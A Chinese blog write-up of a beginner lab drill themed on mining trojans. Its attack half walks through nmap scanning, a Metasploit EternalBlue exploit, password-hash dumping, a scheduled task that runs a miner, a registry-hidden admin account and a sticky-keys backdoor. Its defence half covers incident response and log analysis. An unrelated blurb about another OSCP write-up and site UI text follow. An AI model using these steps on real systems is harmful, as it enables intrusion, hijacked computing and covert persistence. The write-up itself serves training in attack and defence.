挖矿木马和后门植入的渗透测试及应急响应项目writeup

项目背景

近年来,加密货币的迅速发展,也催生了一种全新的黑产——挖矿木马。 挖矿木马源于数字货币,利用挖矿程序获取数字货币利益。随着比特币等数字货 币交易价格的不断攀高,各类挖矿木马的身价水涨船高,数量也急剧增加。 一旦设备被入侵并被植入了挖矿木马,那便成了黑客的敛财工具。因此在短 短几年内就催生出一大批的挖矿木马家族,与之一起增加的还有对各个平台设备 的大量攻击。 2020-2023 年期间,阿 G 和阿 K 觉得虚拟币值钱,就钻研技术,编写木马程序,攻击、控制他人计算机,使 2400 余台计算机变成“肉鸡”为其“挖矿” 赚虚拟币。 2020 年 10 月开始,他对原先的木马程序进行了升级改造。在此基础上, 他先是使用自己的云服务器扫描爆破弱口令(设置简单的口令密码)服务器的远程账号和密码,获得账号密码后,远程登录对方的服务器,再使用命令将其开发的木马程序上传到服务器,实现病毒传播。接着,阿G 和阿K又使用被其控制的服务器去扫描爆破弱口令的服务器账号密码,从而控制更多的服务器。这就如传染病一样,可以感染、控制更多的计算机。 感染了由他编写木马程序后的计算机会自动下载运行“挖矿”程序,这样大 量的计算机就能被阿G 和阿K控制用于“挖矿”。

以此为背景做一次简单的初学者攻防演练

攻击方(渗透部分):

 1. 信息收集

自查kali的ip

ifconfig


已经确定kali和靶机是在同一局域网下的,所以进行nmap扫描

nmap -sP 192.168.145.0/24


排除掉较小的1和2,较大的254,以及kali的ip131,另外俩个黑盒机器133和129,我们确定靶机的ip为192.168.145.132

ping通靶机

 确定能ping通靶机,确定是能联网的,ctrl+c结束

对靶机进行nmap扫描

 发现一些重要端口:tcp 80,tcp 139,tcp 445,tcp 3389

也可以dirb扫描一下目录

dirb http://192.168.145.132

此时信息搜集基本完成,下边进行漏洞利用

2.  漏洞利用

由于发现445端口,我们尝试注入永恒之蓝

打开metasploit

msfconsole

搜索ms17-010相关模块

search ms17-010

可以看看各个选项的意思,这里我们选择扫描模块(即1模块)

use auxiliary/scanner/smb/smb_ms17_010

 也可以是

use 1

 

 查看配置选项

show options

 其中,required列表下为yes的元组是必填选项,no则可以不填

我们发现RHOSTS需要填入,即靶机地址需要填入

set rhosts 192.168.145.132

开始扫描漏洞,再次证实靶机存在MS17-010漏洞

exploit

 

 现在使用永恒之蓝攻击模块攻击,即使用2模块:exploit/windows/smb/ms17_010_eternalblue
 

use exploit/windows/smb/ms17_010_eternalblue

use 2

 提示配置路径,这里就用默认配置就行

同样查看配置选项并进行配置

 输入exploit开始攻击

渗透成功

shell打开会话进行后渗透

出现乱码,输入

chcp 65001

调整回正确的显示

退出用户,利用永恒之蓝提取系统用户和密码hash值

run post/windows/gather/hashdump

 找解码工具进行解码

 获取到

用户名:xioanan$

密码:w123456!

ps查看进程:

抓图,实时监控

 能整的花东西还有很多

我们现在先干正事,上传木马过去

 选定一个Administrator目标文件夹存放木马,上传成功

 再用上边的方法建立shell创造一个system计划任务,每一分钟执行一次javs.exe

shell
chcp 65001
schtasks /create /tn system /sc minute /mo 1 /tr C:\Users\Administrator\Downloads\wkbd\javs.exe  /ru system /f

 

system计划任务建立成功

3.后门植入

进入shell,创建新账户

net user akk$ Hacker123! /add

新用户升级为管理员权限

net localgroup Administrators akk$ /add

这时如果登录靶机会发现用户已经创建成功且已经在管理员组中

退出shell,启动远程桌面

run post/windows/manage/enable_rdp

使用远程桌面一般配合查看远程用户的空闲时长

idletime

 使用rdesktop远程连接桌面

rdesktop 192.168.145.132

使用刚创建的akk$登入

用户隐藏

win->运行,输入regedit打开注册表

HKEY_LOACL_MACHINE/SAM/Domains/Account/Users/Names,分别选择Administrator用户和akk$用户,查看对应值,

 

然后在Users下可以找到对应文件

 

从对应的000001F4中打开F复制值,粘贴到akk$对应000003E8的F值里 

 

 (这是粘贴后的结果图)

将akk$和000003E8右击导出(随便一个地方,自己找的到就行)

删除akk$用户,

再点击刚刚导出的俩个文件,会自动导入注册表

导入后完成用户隐藏

权限维持——shift粘滞键后门

1.粘滞键的启动程序在 C 盘的 Windows/system32 目录下,为 sethc.exe。所以我们打开注册表,定位到以下路径: HKEY_LOCAL_MACHINE\ SOFTWARE \ Microsoft \ Windows NT \ CurrentVersion \ Image File ExecutionOption

2、在目录中新建一个 sethc.exe 的子项,并添加一个新键 debugger,debugger 的对应键值为 cms 的路径。 cmd 路径:C:\Windows\system32\cmd.exe

防守方:

1. 应急响应

 发现一段时间内cpu占用率很高且一直在访问域名:mine.c3pool.com.13333

微步在线查看域名:mine.c3pool.com

 发现是矿池域名,服务器中了wakuang病毒

 在任务管理器里找到挖矿程序javs.exe,结束掉

但结束掉程序几分钟后,javs.exe程序又出现了,并且消耗极大cpu和内存,怀疑可能存在计划任务

查看计划任务表

win->管理工具->任务计划表

 发现果然存在计划任务,我们右击结束掉计划任务,为保险起见,我们在任务管理器中右击该挖矿进程,找到文件位置

我们在文件中找到一个config.json文件,打开看看

再次证实是wakuang病毒,保留有用信息后删除文件夹

 之后继续观察,发现计划任务果然没有重复

2.后门排查

使用Autoruns工具查看服务器所有的进程

点击everything,其中粉红色为可疑进程经过排查

经过排查,均不是恶意进程,服务器恶意程序均已排除 

点击logon,观察启动项

未发现异常

点击scheduled tasks ,查看计划任务

未发现异常,之前的system计划任务已经被删除

点击services,查看服务

未发现异常 

点击image,查看镜像劫持

 发现了shift粘滞键后门,后门路径是C:\windows\system32\cmd.exe,可以在不登录服务器的情况下用粘滞键以管理员权限打开cmd终端

查看隐藏账号

通过控制面板->用户账号->管理账户 查看账户信息

这里会发现看不到之前创建的隐藏账户,但是同上的方法打开注册表,是能够看到账号信息的


3. 事件溯源

 查看wakuang病毒计划任务创建时间

在之前的任务计划上可以看到较多信息

排查安全日志

提取安全日志

下载好evtx程序,使用evtx提取系统的日志,在服务器下载evtx,以管理员身份运行evtx_0x64文件(根据系统多少位判断用哪一个)中的evtx.exe项

 运行之后日志提取到了上上一级evtx目录

 分析安全日志

使用windows日志分析工具logon分析日志

下载好工具

将提取出来的日志,放在logon下的data里面(注意需要把之前的data内容清空)

之后运行bin目录下的Run.bat程序

 

 再次打开data,发现内容改变,已经变成统计结束的各种表单

查看4625.csv文件,此文件记录的是所有登录失败的信息

 发现7月12日有黑客爆破Administrator账户,但是均没有记录攻击ip

查看4624.csv文件,此文件记录的是所有登录成功的信息

 发现攻击ip 192.168.145.131 成功登录服务器

通过win->管理工具->事件查看器查看(这也是另一种查看日志的方法)

 发现黑客利用administrator账户创建了隐藏账户agg$

 之后将agg$隐藏账户添加到超级管理员组,具有超级管理员权限

 发现有端倪的域名通过微步在线没有发现更多信息

还可以仔细观察日志获取更多信息,本文不再列举

  • 8
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 2
    评论
OSCP 2023 Challenge Writeup-MedTech-CSDN博客是一个关于OSCP挑战赛的技术解析博客。在这篇博客中,作者详细讲解了一个名为MedTech的挑战项目,并提供了解决该挑战所需的步骤和工具。 这篇博客的开头介绍了OSCP证书的重要性和它在信息安全领域的认可度。接着,作者向读者介绍了挑战项目MedTech的背景和目标。MedTech是一个模拟医疗技术公司的网络环境,参与者需要在该环境中寻找漏洞、获取权限,最终控制主机,获取FLAG。 在解决这个挑战的过程中,作者详细介绍了使用的工具和技术。例如,他讲解了利用漏洞扫描工具Nmap进行主机发现和服务探测的步骤,以及如何使用Metasploit框架进行漏洞利用和提权。 博客中还涵盖了其他一些有关网络渗透测试的技术,如枚举、社会工程学和Web应用程序漏洞利用。作者详细解释了每个技术的原理和实际应用。 在解决MedTech挑战的过程中,作者还分享了一些遇到的困难和技巧。他提到了一些常见的错误和陷阱,并分享了如何避免它们的经验。 最后,作者总结了整个挑战的过程,并分享了他在完成挑战时的成就感和收获。他强调了在这个过程中学到的技能和知识的重要性,并鼓励读者积极参与类似的挑战和项目。 这篇博客不仅提供了对OSCP挑战赛的深入了解,而且为读者提供了解决类似问题的思路和方法。它对于那些对信息安全网络渗透感兴趣的读者来说是一个很有价值的参考资源。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 2
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值